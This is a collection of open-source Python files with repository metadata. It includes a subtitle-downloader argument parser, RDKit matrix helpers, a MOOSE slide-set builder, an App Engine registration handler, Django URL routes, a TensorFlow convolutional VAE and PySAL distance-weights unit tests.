                              const=SubtitleNamingStrategy.VIDEO_LANG_UPLOADER,
                              help=_('Use the local video filename + uploader + language '
                                     'as name for the downloaded subtitle.'))
    parser.set_defaults(naming_strategy=SubtitleNamingStrategy.VIDEO_LANG)
    # online options
    online_group = parser.add_argument_group('online', 'Change parameters related to the online provider.')
    online_group.add_argument('--provider', dest='providers', metavar='NAME [KEY1=VALUE1 [KEY2=VALUE2 [...]]]',
                              nargs=argparse.ONE_OR_MORE, default=None, action=ProviderAction,
                              help=_('Enable and configure a provider.'))
    return parser
|
subdownloader/subdownloader
|
subdownloader/client/arguments.py
|
Python
|
gpl-3.0
| 12,582
|
[
"VisIt"
] |
65ef148e0d6ad36ef5684a9cfe55f3a3f553a5ca974a57515e540661c72c9e72
|
# $Id$
#
# Copyright (C) 2000-2006 greg Landrum
#
# @@ All Rights Reserved @@
# This file is part of the RDKit.
# The contents are covered by the terms of the BSD license
# which is included in the file license.txt, found at the root
# of the RDKit source tree.
#
""" Matrix operations which may or may not come in handy some day
**NOTE**: the two functions defined here have been moved to ML.Data.Stats
"""
from __future__ import print_function
import sys
from rdkit.ML import files
from rdkit.ML.Data import Stats
# Backwards-compatible aliases: the implementations live in ML.Data.Stats
# (see the module docstring above).
FormCovarianceMatrix = Stats.FormCovarianceMatrix
PrincipalComponents = Stats.PrincipalComponents
if __name__ == '__main__':
    # Usage: MatOps.py <datafile> — reads a data file and prints the
    # eigenvalues/eigenvectors of its principal components.
    fileN = sys.argv[1]
    iV, dV = files.ReadDataFile(fileN)
    eVals, eVects = PrincipalComponents(iV)
    print('eVals: ', eVals)
    print('eVects:', eVects)
|
rvianello/rdkit
|
rdkit/ML/MatOps.py
|
Python
|
bsd-3-clause
| 813
|
[
"RDKit"
] |
41a2cc4aa664ea9fdafe0862499d5f96855d2d2789e77eb334bfad6a3e1e01a2
|
# Load python packages
import re, sys, math
from collections import OrderedDict
# Load Moose packages
from FactorySystem import MooseObject
from ..slides import RemarkSlide, SlideWarehouse
##
# Base class for markdown slide generation
class RemarkSlideSet(MooseObject):
    """Base class for generating a set of Remark markdown slides.

    NOTE(review): this module is Python 2 only (print statements and
    dict.iteritems are used below).
    """
    ##
    # Defines the available properties for the SlideSet base class
    @staticmethod
    def validParams():
        params = MooseObject.validParams()
        params.addRequiredParam('type', 'The type of slide set to create')
        params.addParam('title', 'The title of the slide set, if this exists a title slide will be injected')
        params.addParam('active', [], 'A list of ordered slide names to output, if blank all slides are output')
        params.addParam('inactive', [], 'A list of slide names to exclude from output')
        params.addParam('contents', False, 'Include table of contents slide')
        params.addParam('contents_title', 'The table-of-contents heading for this slide set')
        params.addParam('contents_level', 1, 'The heading level to include in the contents')
        params.addParam('contents_items_per_slide', 15, 'The number of contents items to include on a page')
        params.addParam('show_in_contents', True, 'Toggle if slide set content appears in the table-of-contents')
        params.addParam('style', 'The CSS style sheet to utilize for this slide set')
        params.addParam('non_ascii_warn', True, 'Produce warning if non-ascii characters are located')
        # Create the common parameters from RemarkSlide 'properties' group
        slide_params = RemarkSlide.validParams()
        for key in slide_params.groupKeys('properties'):
            params.addParam(key, slide_params.getDescription(key))
        params.addParamsToGroup('properties', slide_params.groupKeys('properties'))
        return params
    ##
    # Constructor
    # @param name The name of the object
    # @param params The InputParameters for the object being created
    # @param kwars Optional key, value pairings
    #
    # Optional key, value pairs:
    #   slide_type = <str>
    #   The name of the Slide class to build, by default 'Slide' is used
    def __init__(self, name, params, **kwargs):
        MooseObject.__init__(self, name, params)
        # Set the Slide type
        self.__slide_type = kwargs.pop('slide_type', 'RemarkSlide')
        # Get a reference to the items needed to create objects
        self.__factory = self.getParam('_factory')
        self.__parser = self.getParam('_parser')
        self.__root = self.getParam('_root')
        # Create a storage object for the slides created by this set
        self.__slide_warehouse = SlideWarehouse(set_name = name, \
                                                active = self.getParam('active'), \
                                                inactive = self.getParam('inactive'))
        # Storage for markdown links
        self.__links = []
        # Print a message
        print '  ', name
    ##
    # The method that creates/retrieves the markdown (virtual)
    def read(self):
        return ''
    ##
    # Returns a reference to the SlideWarehouse object
    def warehouse(self):
        return self.__slide_warehouse
    ##
    # Creates the individual RemarkSlide objects
    # @param raw The raw markdown, obtained from read() method, to separate into slides
    def build(self, markdown):
        # Extract links
        markdown = re.sub(r'\[.*?\]:.*?\n', self.__subLinkStorage, markdown)
        # Separate the slide content
        raw_slides = re.split(r'\n---', markdown)
        # Build the individual slide objects
        for raw in raw_slides:
            if raw:
                slide = self.__createSlide(raw)
                self.warehouse().addObject(slide)
        # Create the title slide
        if self.isParamValid('title'):
            name = self.name() + '-title'
            raw = '# ' + self.getParam('title') + '\n'
            options = {'show_in_contents':False, 'title':True, 'name':name, 'class':'center,middle'}
            slide = self.__createSlide(raw, **options)
            self.warehouse().insertObject(0, slide)
    ##
    # Return the complete markdown for this slide set
    def markdown(self):
        # Create a list of all the slide markdown
        output = []
        # Extract the slide content
        for slide in self.warehouse().activeObjects():
            output.append(slide.markdown)
        # Join the list with slide breaks
        output = '\n---\n'.join(output)
        # Append the links
        for link in self.__links:
            output += link + '\n'
        return output
    ##
    # Sub method for storing wiki link shortcuts
    def __subLinkStorage(self, match):
        self.__links.append(match.group(0).replace(r'\r\n',''))
        return ''
    ##
    # Create the a slide from raw markdown (private)
    # @param raw The raw markdown to build the slide from
    # @param kwargs Optional key, value pairs
    #
    def __createSlide(self, raw, **kwargs):
        # Get the default input parameters from the slide being created
        params = self.__factory.validParams('RemarkSlide')
        params.applyParams(self.parameters())
        # Add the parent and markdown parameters
        params.addPrivateParam('_parent', self)
        # Over-ride parameters with optional key, value pairs
        for key, value in kwargs.iteritems():
            params[key] = value
        # Build the slide object
        slide = self.__factory.create(self.__slide_type, params)
        # Determine and set the slide name
        raw = slide.parseName(raw)
        # Apply the [./Slides] block
        if self.__root:
            node = self.__root.getNode(self.name()).getNode('Slides')
            if node:
                node = node.getNode(slide.name())
                if node:
                    print ' '*6 + 'Apply settings from input file'
                    self.__parser.extractParams('', slide.parameters(), node)
        # Parse the raw markdown and store it in the slide
        self._parseSlide(slide, raw)
        return slide
    ##
    # Method that calls the various parse methods for the slide content (protected)
    # This also applies settings from the input file, this method exists to
    # allow parent classes to modify slide settings
    # @see INLDjangoWikiSet, INLCoverSet, INLMergeSet
    def _parseSlide(self, slide, raw):
        # Parse the content into Remark format and store the content in the slide
        raw = slide.parse(raw)
        raw = slide.parseImages(raw)
        slide.markdown = raw
    ##
    # A helper that extracts the contents entries from each of the active slides (protected)
    def _extractContents(self):
        contents = []
        # Loop through all active slides
        for slide in self.warehouse().activeObjects():
            # Do nothing if the contents for the slides are disabled
            if not slide.getParam('show_in_contents'):
                continue
            # Build a tuple containing the table-of-contents information for this slide
            # (heading text, slide name, heading level, slide number)
            pattern = re.compile(r'^\s*(#+)\s+(.*)', re.MULTILINE)
            for m in pattern.finditer(slide.markdown):
                contents.append((m.group(2).strip(), slide.name(), len(m.group(1)), slide.number))
        # Separate contents into chunks based on the allowable size
        n = int(self.getParam('contents_items_per_slide'))
        output = [contents[i:i+n] for i in range(0, len(contents),n)]
        return output
    ##
    # A helper method that creates the empty contents slides (protected)
    # @param number The number of contents entries
    def _createContentsSlides(self, n):
        # Determine the table of contents header
        if self.isParamValid('contents_title'):
            contents_title = '# ' + self.getParam('contents_title') + '\n'
        elif self.isParamValid('title'):
            contents_title = '# ' + self.getParam('title') + ' Contents\n'
        else:
            contents_title = '# Contents\n'
        # Locate the slide insert location
        # (insert after the title slide when one exists)
        if self.warehouse().hasObject(self.name() + '-title'):
            idx = 1
        else:
            idx = 0
        # Add the content(s) slides
        for i in range(n):
            name = '-'.join([self.name(), 'contents', str(i)])
            options = {'name' : name, 'show_in_contents' : False}
            if i == 0:
                slide = self.__createSlide(contents_title, **options)
            else:
                slide = self.__createSlide('', **options)
            self.warehouse().insertObject(idx, slide)
            idx += 1
    ##
    # Initialize contents (public)
    # This creates and inserts the correct number of contents slides
    # @see SlideSetWarehouse::__contents
    def initContents(self):
        # Do nothing if the 'contents' flag is not set in the input file
        if not self.getParam('contents'):
            return
        # Extract the contents entries
        contents = self._extractContents()
        # Create the contents slides
        self._createContentsSlides(len(contents))
    ##
    # Inserts the table-of-contents html into the already existing contents slides (public)
    # @see SlideSetWarehouse::__contents
    def contents(self):
        # Do nothing if the 'contents' flag is not set in the input file
        if not self.getParam('contents'):
            return
        # Extract the contents entries
        contents = self._extractContents()
        # Build the table-of-contents entries
        # NOTE(review): max_per_slide is computed but never used below.
        max_per_slide = int(self.getParam('contents_items_per_slide'))
        lvl = int(self.getParam('contents_level'))
        for i in range(len(contents)):
            output = ''
            for item in contents[i]:
                if item[2] <= lvl:
                    title = item[0]          # the heading content
                    name = item[1]           # slide name
                    indent = 25*(item[2]-1)  # heading level indenting
                    idx = str(item[3])       # slide index
                    height = '12px'
                    # Build a link to the slide, by name
                    link = '<a href="#' + name + '">'
                    # Create the contents entry
                    output += '<p style="line-height:' + height + ';text-align:left;text-indent:' + str(indent) + 'px;">' + link + title + '</a>'
                    output += '<span style="float:right;">' + link + idx + '</a>'
                    output += '</span></p>\n'
            # Write the contents to the slide
            name = '-'.join([self.name(), 'contents', str(i)])
            self.warehouse().getObject(name).markdown += output
|
mellis13/moose
|
python/PresentationBuilder/slidesets/RemarkSlideSet.py
|
Python
|
lgpl-2.1
| 9,831
|
[
"MOOSE"
] |
636129ff0bf4a4499b1ed48e8dd6365878d9adb62921a7214276535ddb2125d7
|
# Copyright 2014 Roberto Brian Sarrionandia
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import webapp2
from google.appengine.ext import ndb
import tusers
import logging
from models import InstitutionTeam, InstitutionJudge
class RegHandler(webapp2.RequestHandler):
    """Registers a new team or judge for an institution, then redirects back.

    GET parameters:
        i    -- urlsafe ndb key of the institution (its ndb parent is the
                registration entity)
        type -- 't' to register a team, 'j' to register a judge
    """
    def get(self):
        user = tusers.get_current_user()
        #Get the institution
        i = self.request.get('i')
        i_key = ndb.Key(urlsafe=i)
        institution = i_key.get()
        # The registration entity is the institution's datastore parent.
        reg = i_key.parent().get()
        # Guard: user must be authorised for this institution, registration
        # must be open, and institutions are capped at 20 teams.
        if institution.authorised(user) and reg.open and institution.teams().count(limit=20)<20:
            if self.request.get('type') == 't':
                #Register a new Team
                team = InstitutionTeam(parent=institution.key)
                team.put()
            if self.request.get('type') == 'j':
                #Register a new judge
                judge = InstitutionJudge(parent=institution.key)
                judge.put()
        # Always bounce back to the referring page, even when nothing was added.
        self.redirect(self.request.referer)
# webapp2 routing table: /add_to_reg is handled by RegHandler.
app = webapp2.WSGIApplication([
    ('/add_to_reg', RegHandler)
], debug=True)
|
sarrionandia/tournatrack
|
reg_add.py
|
Python
|
apache-2.0
| 1,433
|
[
"Brian"
] |
6d76afa388427ef06d0fd2869b807faaf80cbe900665a9a0a637f7d3e942a650
|
from django.conf import settings
from django.conf.urls import include, url
from django.conf.urls.static import static
from django.contrib import admin
from django.views.generic import TemplateView
from django.views import defaults as default_views
from neural_exploration.visualize.views import SpikeDataView
# Project URL routing table.
# NOTE(review): SpikeDataView is routed without .as_view(); that is only valid
# if it is a function-based view — confirm against visualize/views.py.
urlpatterns = [
    url(r'^$', view=SpikeDataView, name='home'),#TemplateView.as_view(template_name='pages/home.html'), name='home'),
    url(r'^about/$', TemplateView.as_view(template_name='pages/about.html'), name='about'),
    # Django Admin, use {% url 'admin:index' %}
    url(settings.ADMIN_URL, admin.site.urls),
    # User management
    url(r'^users/', include('neural_exploration.users.urls', namespace='users')),
    url(r'^accounts/', include('allauth.urls')),
    # Your stuff: custom urls includes go here
    url(r'^spike/', include('neural_exploration.visualize.urls')),
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
if settings.DEBUG:
    # This allows the error pages to be debugged during development, just visit
    # these url in browser to see how these error pages look like.
    urlpatterns += [
        url(r'^400/$', default_views.bad_request, kwargs={'exception': Exception('Bad Request!')}),
        url(r'^403/$', default_views.permission_denied, kwargs={'exception': Exception('Permission Denied')}),
        url(r'^404/$', default_views.page_not_found, kwargs={'exception': Exception('Page not Found')}),
        url(r'^500/$', default_views.server_error),
    ]
    if 'debug_toolbar' in settings.INSTALLED_APPS:
        import debug_toolbar
        # Prepend so the toolbar route wins over catch-all patterns.
        urlpatterns = [
            url(r'^__debug__/', include(debug_toolbar.urls)),
        ] + urlpatterns
|
brookefitzgerald/neural-exploration
|
config/urls.py
|
Python
|
mit
| 1,721
|
[
"VisIt"
] |
51d42cace981dee0589f80a86da7c0249a1d9a1652b27be8cb1e7b2b4242b7ff
|
import os
import sys
import datetime
import tensorflow as tf
import numpy as np
import prettytensor as pt
from convolutional_vae_util import deconv2d
from utils import *
class CVAE(object):
    '''
    CVAE: Convolutional Variational AutoEncoder
    Builds a convolutional variational autoencoder that compresses
    input_shape to latent_size and then back out again. It uses
    the reparameterization trick and conv/conv transpose to achieve this.
    '''
    # NOTE(review): this class uses Python 2 syntax (print statements) and
    # pre-1.0 TensorFlow / prettytensor APIs (tf.mul, tf.histogram_summary,
    # tf.merge_all_summaries, tf.train.SummaryWriter) — it requires the
    # era-appropriate environment and will not run on modern TF.
    def __init__(self, sess, input_shape, batch_size, latent_size=128, e_dim=64, d_dim=64):
        # input_shape: (height, width) of a single input image (flattened below)
        self.input_shape = input_shape
        self.input_size = np.prod(input_shape)
        self.latent_size = latent_size
        self.e_dim = e_dim
        self.d_dim = d_dim
        self.iteration = 0
        with tf.variable_scope(self.get_name()):
            self.inputs = tf.placeholder(tf.float32, [None, self.input_size], name="inputs")
            # z = mu + sigma * epsilon
            # epsilon is a sample from a N(0, 1) distribution
            with tf.variable_scope("z"): # Encode our data into z and return the mean and covariance
                self.z_mean, self.z_log_sigma_sq = self.encoder(self.inputs, latent_size)
                # Fall back to the static batch_size when the batch dimension
                # is not known at graph-construction time.
                eps_batch = self.z_log_sigma_sq.get_shape().as_list()[0] \
                            if self.z_log_sigma_sq.get_shape().as_list()[0] is not None else batch_size
                eps = tf.random_normal([eps_batch, latent_size], 0.0, 1.0, dtype=tf.float32)
                self.z = tf.add(self.z_mean,
                                tf.mul(tf.sqrt(tf.exp(self.z_log_sigma_sq)), eps))
                # Get the reconstructed mean from the decoder
                self.x_reconstr_mean = self.decoder(self.z, self.input_size)
                self.z_summary = tf.histogram_summary("z", self.z)
            with tf.variable_scope("z", reuse=True): # The test z
                self.z_mean_test, self.z_log_sigma_sq_test = self.encoder(self.inputs, latent_size, phase=pt.Phase.test)
                eps_batch = self.z_log_sigma_sq.get_shape().as_list()[0] \
                            if self.z_log_sigma_sq.get_shape().as_list()[0] is not None else batch_size
                eps = tf.random_normal([eps_batch, latent_size], 0.0, 1.0, dtype=tf.float32)
                self.z_test = tf.add(self.z_mean_test,
                                     tf.mul(tf.sqrt(tf.exp(self.z_log_sigma_sq_test)), eps))
                # Get the reconstructed mean from the decoder
                self.x_reconstr_mean_test = self.decoder(self.z_test, self.input_size, phase=pt.Phase.test)
            # Optimize only on the training variables
            self.loss, self.optimizer = self._create_loss_and_optimizer(self.inputs,
                                                                        self.x_reconstr_mean,
                                                                        self.z_log_sigma_sq,
                                                                        self.z_mean)
            self.loss_summary = tf.scalar_summary("loss", self.loss)
            self.summaries = tf.merge_all_summaries()
            self.summary_writer = tf.train.SummaryWriter("logs/" + self.get_name() + self.get_formatted_datetime(),
                                                         sess.graph)
            self.saver = tf.train.Saver()
    def save(self, sess, filename):
        # Persist all model variables to `filename` via the TF saver.
        print 'saving cvae model to %s...' % filename
        self.saver.save(sess, filename)
    def load(self, sess, filename):
        # Restore variables from `filename` if the checkpoint file exists;
        # silently does nothing otherwise.
        if os.path.isfile(filename):
            print 'restoring cvae model from %s...' % filename
            self.saver.restore(sess, filename)
    def get_name(self):
        # Deterministic model name derived from the hyperparameters; also
        # used as the variable scope and the log-directory prefix.
        return "cvae_input_%dx%d_latent%d_edim%d_ddim%d" % (self.input_shape[0],
                                                            self.input_shape[1],
                                                            self.latent_size,
                                                            self.e_dim,
                                                            self.d_dim)
    def get_formatted_datetime(self):
        # Current timestamp with filesystem-safe separators (underscores).
        return str(datetime.datetime.now()).replace(" ", "_") \
                                           .replace("-", "_") \
                                           .replace(":", "_")
    # Taken from https://jmetzen.github.io/2015-11-27/vae.html
    def _create_loss_and_optimizer(self, inputs, x_reconstr_mean, z_log_sigma_sq, z_mean):
        # The loss is composed of two terms:
        # 1.) The reconstruction loss (the negative log probability
        #     of the input under the reconstructed Bernoulli distribution
        #     induced by the decoder in the data space).
        #     This can be interpreted as the number of "nats" required
        #     for reconstructing the input when the activation in latent
        #     is given.
        self.reconstr_loss = \
            -tf.reduce_sum(inputs * tf.log(tf.clip_by_value(x_reconstr_mean, 1e-10, 1.0))
                           + (1.0 - inputs) * tf.log(tf.clip_by_value(1.0 - x_reconstr_mean, 1e-10, 1.0)),
                           1)
        # 2.) The latent loss, which is defined as the Kullback Libeler divergence
        ##    between the distribution in latent space induced by the encoder on
        #     the data and some prior. This acts as a kind of regularize.
        #     This can be interpreted as the number of "nats" required
        #     for transmitting the the latent space distribution given
        #     the prior.
        self.latent_loss = -0.5 * tf.reduce_sum(1.0 + z_log_sigma_sq
                                                - tf.square(z_mean)
                                                - tf.exp(z_log_sigma_sq), 1)
        loss = tf.reduce_mean(self.reconstr_loss + self.latent_loss)   # average over batch
        optimizer = tf.train.AdamOptimizer(learning_rate=1e-4).minimize(loss)
        return loss, optimizer
    def decoder(self, z, projection_size, activ=tf.nn.elu, phase=pt.Phase.train):
        # Maps a latent vector z back to a flattened reconstruction via
        # transposed convolutions; final sigmoid keeps outputs in [0, 1].
        with pt.defaults_scope(activation_fn=activ,
                               batch_normalize=True,
                               learned_moments_update_rate=0.0003,
                               variance_epsilon=0.001,
                               scale_after_normalization=True,
                               phase=phase):
            return (pt.wrap(z).
                    reshape([-1, 1, 1, self.latent_size]).
                    deconv2d(3, 128, edges='VALID', phase=phase).
                    deconv2d(5, 64, edges='VALID', phase=phase).
                    deconv2d(5, 32, stride=2, phase=phase).
                    deconv2d(5, 1, stride=2, activation_fn=tf.nn.sigmoid, phase=phase).
                    flatten()).tensor
    def encoder(self, inputs, latent_size, activ=tf.nn.elu, phase=pt.Phase.train):
        # Convolutional encoder; the final fully-connected layer emits
        # 2*latent_size values that are split into mean and log-variance.
        with pt.defaults_scope(activation_fn=activ,
                               batch_normalize=True,
                               learned_moments_update_rate=0.0003,
                               variance_epsilon=0.001,
                               scale_after_normalization=True,
                               phase=phase):
            params = (pt.wrap(inputs).
                      reshape([-1, self.input_shape[0], self.input_shape[1], 1]).
                      conv2d(5, 32, stride=2).
                      conv2d(5, 64, stride=2).
                      conv2d(5, 128, edges='VALID').
                      #dropout(0.9).
                      flatten().
                      fully_connected(self.latent_size * 2, activation_fn=None)).tensor
            mean = params[:, :self.latent_size]
            stddev = params[:, self.latent_size:]
            return [mean, stddev]
    def partial_fit(self, sess, inputs):
        """Train model based on mini-batch of input data.
        Return cost of mini-batch.
        """
        inputs = self.normalize(inputs)
        feed_dict = {self.inputs: inputs}
        # Only write TensorBoard summaries every 10th step to limit overhead.
        if self.iteration % 10 == 0:
            _, summary, cost = sess.run([self.optimizer, self.summaries, self.loss],
                                        feed_dict=feed_dict)
            self.summary_writer.add_summary(summary, self.iteration)
        else:
            _, cost = sess.run([self.optimizer, self.loss],
                               feed_dict=feed_dict)
        self.iteration += 1
        return cost
    def transform(self, sess, inputs):
        """
        Transform data by mapping it into the latent space.
        Taken from https://jmetzen.github.io/2015-11-27/vae.html
        """
        # Note: This maps to mean of distribution, we could alternatively
        # sample from Gaussian distribution
        inputs = self.normalize(inputs)
        feed_dict={self.inputs: inputs}
        return sess.run(self.z_mean_test,
                        feed_dict=feed_dict)
    def generate(self, sess, z_mu):
        """
        Generate data by sampling from latent space.
        Taken from https://jmetzen.github.io/2015-11-27/vae.html
        """
        # Note: This maps to mean of distribution, we could alternatively
        # sample from Gaussian distribution
        feed_dict={self.z_test: z_mu}
        return sess.run(self.x_reconstr_mean_test,
                        feed_dict=feed_dict)
    def normalize(self, arr):
        # Normalization is currently a no-op (the standardization below was
        # deliberately disabled); kept as a hook for future preprocessing.
        #return (arr - np.mean(arr)) / (np.std(arr) + 1e-9)
        return arr
    def reconstruct(self, sess, X):
        """
        Use VAE to reconstruct given data.
        Taken from https://jmetzen.github.io/2015-11-27/vae.html
        """
        X = self.normalize(X)
        feed_dict={self.inputs: X}
        return sess.run(self.x_reconstr_mean_test,
                        feed_dict=feed_dict)
    def train(self, sess, source, batch_size, training_epochs=10, display_step=5):
        # `source` is expected to expose source.train.num_examples and
        # source.train.next_batch(batch_size) (MNIST-style dataset object).
        n_samples = source.train.num_examples
        for epoch in range(training_epochs):
            avg_cost = 0.
            total_batch = int(n_samples / batch_size)
            # Loop over all batches
            for i in range(total_batch):
                batch_xs, _ = source.train.next_batch(batch_size)
                # Fit training using batch data
                cost = self.partial_fit(sess, batch_xs)
                # Compute average loss
                avg_cost += cost / n_samples * batch_size
            # Display logs per epoch step
            if epoch % display_step == 0:
                print "[Epoch:", '%04d]' % (epoch+1), \
                      "current cost = ", "{:.9f} | ".format(cost), \
                      "avg cost = ", "{:.9f}".format(avg_cost)
|
jramapuram/CVAE
|
cvae.py
|
Python
|
mit
| 10,644
|
[
"Gaussian"
] |
b82bd1db56273100e035f474d35ac2269c41a90886560f1f2c620f92158cfa6f
|
from pysal.weights import Distance as d
from pysal.weights.util import get_points_array
from pysal.weights import Contiguity as c
from pysal.common import RTOL, ATOL
from pysal.cg.kdtree import KDTree
import numpy as np
import pysal as ps
import unittest as ut
PANDAS_EXTINCT = ps.common.pandas is None
# All instances should test these four methods, and define their own functional
# tests based on common codepaths/estimated weights use cases.
class Distance_Mixin(object):
    """Shared fixtures for the distance-weights test cases below.

    Provides point sets, KDTrees (euclidean and arc distance) and shapefile
    handles; subclasses override the ``known_*`` attributes and implement the
    four required tests.
    """
    polygon_path = ps.examples.get_path('columbus.shp')
    arc_path = ps.examples.get_path('stl_hom.shp')
    points = [(10, 10), (20, 10), (40, 10),
              (15, 20), (30, 20), (30, 30)]
    euclidean_kdt = ps.cg.KDTree(points, distance_metric='euclidean')
    polygon_f = ps.open(polygon_path) # our file handler
    poly_centroids = get_points_array(polygon_f) # our iterable
    polygon_f.seek(0) #go back to head of file
    arc_f = ps.open(arc_path)
    # FIX: removed a stray no-op expression statement (`ps.cg.sphere.arcdist`)
    # that evaluated an attribute and discarded the result.
    arc_points = get_points_array(arc_f)
    arc_f.seek(0)
    arc_kdt = ps.cg.KDTree(arc_points, distance_metric='Arc',
                           radius=ps.cg.sphere.RADIUS_EARTH_KM)
    cls = object # class constructor
    known_wi = None #index of known w entry to compare
    known_w = dict() #actual w entry
    known_name = known_wi
    def setUp(self):
        # Copy the mixin's public class attributes onto the instance so each
        # test case starts from a fresh view of the shared fixtures.
        self.__dict__.update({k:v for k,v in Distance_Mixin.__dict__.items()
            if not k.startswith('_')})
    def test_init(self):
        # test vanilla, named
        raise NotImplementedError('You need to implement this test '
                                  'before this module will pass')
    def test_from_shapefile(self):
        # test vanilla, named, sparse
        raise NotImplementedError('You need to implement this test '
                                  'before this module will pass')
    def test_from_array(self):
        # test named, sparse
        raise NotImplementedError('You need to implement this test '
                                  'before this module will pass')
    def test_from_dataframe(self):
        # test named, columnar, defau
        raise NotImplementedError('You need to implement this test '
                                  'before this module will pass')
class Test_KNN(ut.TestCase, Distance_Mixin):
    """Tests for the k-nearest-neighbor weights constructor (d.KNN)."""
    def setUp(self):
        Distance_Mixin.setUp(self)
        # known_wiN is an observation id; known_wN holds its expected four
        # nearest neighbors for the columbus polygon centroids.
        self.known_wi0 = 7
        self.known_w0 = [3, 6, 12, 11]
        self.known_wi1 = 0
        self.known_w1 = [2, 1, 3 ,7]
        self.known_wi2 = 4
        self.known_w2 = [1, 3, 9, 12]
        self.known_wi3 = 40
        self.known_w3 = [31, 38, 45, 49]
    ##########################
    # Classmethod tests      #
    ##########################
    def test_init(self):
        w = d.KNN(self.euclidean_kdt, k=2)
        self.assertEqual(w.neighbors[0], [1,3])
    @ut.skipIf(PANDAS_EXTINCT, 'Missing pandas')
    def test_from_dataframe(self):
        df = ps.pdio.read_files(self.polygon_path)
        w = d.KNN.from_dataframe(df, k=4)
        self.assertEqual(w.neighbors[self.known_wi0], self.known_w0)
        self.assertEqual(w.neighbors[self.known_wi1], self.known_w1)
        # Shuffling the dataframe must change the weights' id_order to match
        # the shuffled index, not the original one.
        perm = df.sample(frac=1)
        w = d.KNN.from_dataframe(perm, k=4)
        with self.assertRaises(AssertionError):
            assert w.id_order == df.index.tolist()
        self.assertEqual(perm.index.tolist(), w.id_order)
    def test_from_array(self):
        w = d.KNN.from_array(self.poly_centroids, k=4)
        self.assertEqual(w.neighbors[self.known_wi0], self.known_w0)
        self.assertEqual(w.neighbors[self.known_wi1], self.known_w1)
    def test_from_shapefile(self):
        w = d.KNN.from_shapefile(self.polygon_path, k=4)
        self.assertEqual(w.neighbors[self.known_wi0], self.known_w0)
        self.assertEqual(w.neighbors[self.known_wi1], self.known_w1)
    ##########################
    # Function/User tests    #
    ##########################
    def test_reweight(self):
        # reweight with an extra point and k=4 must return a new W (not
        # modify in place) whose neighbors include the appended point (id 6).
        w = d.KNN(self.points, k=2)
        new_point = [(21,21)]
        wnew = w.reweight(k=4, p=1, new_data=new_point, inplace=False)
        self.assertEqual(wnew[0], {1: 1.0, 3: 1.0, 4: 1.0, 6: 1.0})
class Test_DistanceBand(ut.TestCase, Distance_Mixin):
    """Tests for DistanceBand weights built from arrays, files, and frames.

    A regular 10x10 unit lattice is used throughout: a distance band of 1
    must reproduce rook contiguity exactly.
    """

    def setUp(self):
        Distance_Mixin.setUp(self)
        self.grid_path = ps.examples.get_path('lattice10x10.shp')
        self.grid_rook_w = c.Rook.from_shapefile(self.grid_path)
        self.grid_f = ps.open(self.grid_path)
        self.grid_points = get_points_array(self.grid_f)
        self.grid_f.seek(0)
        self.grid_kdt = KDTree(self.grid_points)

    ##########################
    #    Classmethod tests   #
    ##########################
    def test_init(self):
        w = d.DistanceBand(self.grid_kdt, 1)
        for k, v in w:
            # assertEqual: assertEquals is a deprecated unittest alias.
            self.assertEqual(v, self.grid_rook_w[k])

    def test_from_shapefile(self):
        w = d.DistanceBand.from_shapefile(self.grid_path, 1)
        for k, v in w:
            self.assertEqual(v, self.grid_rook_w[k])

    def test_from_array(self):
        w = d.DistanceBand.from_array(self.grid_points, 1)
        for k, v in w:
            self.assertEqual(v, self.grid_rook_w[k])

    @ut.skipIf(PANDAS_EXTINCT, 'Missing pandas')
    def test_from_dataframe(self):
        import pandas as pd
        geom_series = ps.pdio.shp.shp2series(self.grid_path)
        random_data = np.random.random(size=len(geom_series))
        df = pd.DataFrame({'obs': random_data, 'geometry': geom_series})
        w = d.DistanceBand.from_dataframe(df, 1)
        for k, v in w:
            self.assertEqual(v, self.grid_rook_w[k])
        # A shuffled frame must carry its shuffled index into id_order.
        perm = df.sample(frac=1)
        w = d.DistanceBand.from_dataframe(perm, 1)
        with self.assertRaises(AssertionError):
            assert w.id_order == df.index.tolist()
        self.assertEqual(w.id_order, perm.index.tolist())

    ##########################
    #   Function/User tests  #
    ##########################
    def test_integers(self):
        """
        see issue #126
        """
        grid_integers = [tuple(map(int, poly.vertices[0]))
                         for poly in self.grid_f]
        self.grid_f.seek(0)
        grid_dbw = d.DistanceBand(grid_integers, 1)
        for k, v in grid_dbw:
            self.assertEqual(v, self.grid_rook_w[k])

    def test_arcdist(self):
        arc = ps.cg.sphere.arcdist
        kdt = KDTree(self.arc_points, distance_metric='Arc',
                     radius=ps.cg.sphere.RADIUS_EARTH_KM)
        npoints = self.arc_points.shape[0]
        # range() replaces xrange, which does not exist on Python 3 and made
        # this test raise NameError there.
        # NOTE(review): np.matrix is deprecated in modern numpy; left as-is
        # to keep the comparison against w.sparse.todense() (also a matrix)
        # unchanged.
        full = np.matrix([[arc(self.arc_points[i], self.arc_points[j])
                           for j in range(npoints)]
                          for i in range(npoints)])
        maxdist = full.max()
        w = d.DistanceBand(kdt, maxdist, binary=False, alpha=1.0)
        np.testing.assert_allclose(w.sparse.todense(), full)

    def test_dense(self):
        w_rook = ps.weights.Rook.from_shapefile(
            ps.examples.get_path('lattice10x10.shp'))
        polys = ps.open(ps.examples.get_path('lattice10x10.shp'))
        centroids = [p.centroid for p in polys]
        w_db = d.DistanceBand(centroids, 1, build_sp=False)
        for k in w_db.id_order:
            np.testing.assert_equal(w_db[k], w_rook[k])
class Test_Kernel(ut.TestCase, Distance_Mixin):
    """Tests for fixed- and adaptive-bandwidth Kernel weights."""

    def setUp(self):
        Distance_Mixin.setUp(self)
        # Expected weights (and, where relevant, bandwidths) for each
        # scenario exercised below.  Values are copied verbatim from the
        # reference fixtures.
        self.known_wi0 = 0
        self.known_w0 = {0: 1, 1: 0.500000049999995, 3: 0.4409830615267465}
        self.known_wi1 = 0
        self.known_w1 = {0: 1.0, 1: 0.33333333333333337,
                         3: 0.2546440075000701}
        self.known_w1_bw = 15.
        self.known_wi2 = 0
        self.known_w2 = {0: 1.0, 1: 0.59999999999999998,
                         3: 0.55278640450004202, 4: 0.10557280900008403}
        self.known_w2_bws = [25.0, 15.0, 25.0, 16.0, 14.5, 25.0]
        self.known_wi3 = 0
        self.known_w3 = [1.0, 0.10557289844279438, 9.9999990066379496e-08]
